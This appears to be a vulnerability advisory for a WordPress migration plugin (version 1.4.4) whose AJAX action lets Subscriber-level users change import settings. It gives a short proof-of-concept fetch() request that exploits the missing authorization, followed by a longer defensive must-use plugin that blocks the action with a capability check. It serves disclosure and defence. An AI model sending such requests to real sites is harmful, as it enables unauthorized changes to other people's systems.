Description: The plugin does not authorize some AJAX requests, allowing users with a role as low as Subscriber to update some plugin settings.
```js
fetch("/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded; charset=UTF-8",
  },
  "body": "settings_data%5Bim_data_size_per_req%5D=100&settings_data%5Bim_db_file_per_req%5D=200&action=mgdp_plugin_save_import_settings",
  "method": "POST",
  "mode": "cors",
  "credentials": "include"
});
```

Open http://127.0.0.1:8001/wp-admin/admin.php?page=wp-migration-duplicator#wt-mgdp-import and click on Advanced Options to see the updated settings.
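One way to block this request until the plugin is updated, shown as an added example (not the plugin's own code): a must-use plugin that enforces a capability check on the AJAX action before the plugin's handler runs. The `manage_options` capability, the `mgdp_guard_*` names, and the assumption that the plugin registers its handler at the default priority of 10 are not taken from the page.

```php
<?php
/**
 * Plugin Name: mgdp AJAX capability guard (added example, not the plugin's code)
 *
 * Place in wp-content/mu-plugins/. The guard is hooked at priority 0 so it
 * runs before a handler registered at the default priority (10, assumed).
 */

// Assumption: only administrators should be able to change import settings.
const MGDP_GUARD_CAPABILITY = 'manage_options';

// Action name taken from the request shown on this page.
const MGDP_GUARD_ACTIONS = array( 'mgdp_plugin_save_import_settings' );

function mgdp_guard_require_capability() {
    if ( current_user_can( MGDP_GUARD_CAPABILITY ) ) {
        return; // Authorized: let the plugin's own handler run.
    }

    $user   = wp_get_current_user();
    $action = isset( $_REQUEST['action'] )
        ? sanitize_key( wp_unslash( $_REQUEST['action'] ) ) : '';
    $ip     = isset( $_SERVER['REMOTE_ADDR'] )
        ? sanitize_text_field( wp_unslash( $_SERVER['REMOTE_ADDR'] ) ) : '';

    // Record the denied attempt so it is visible during log review.
    error_log( sprintf(
        'mgdp-guard: denied action=%s user_id=%d roles=%s ip=%s',
        $action,
        $user->ID,
        implode( ',', (array) $user->roles ),
        $ip
    ) );

    // Sends a JSON error with HTTP 403 and terminates the request,
    // so handlers hooked at later priorities never execute.
    wp_send_json_error( array( 'message' => 'Forbidden' ), 403 );
}

foreach ( MGDP_GUARD_ACTIONS as $mgdp_guard_action ) {
    add_action( 'wp_ajax_' . $mgdp_guard_action, 'mgdp_guard_require_capability', 0 );
}
```

With the guard in place, the same request sent from a Subscriber session returns HTTP 403 and the values under Advanced Options stay unchanged.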
| CPE | Name | Operator | Version |
|---|---|---|---|
| | | eq | 1.4.4 |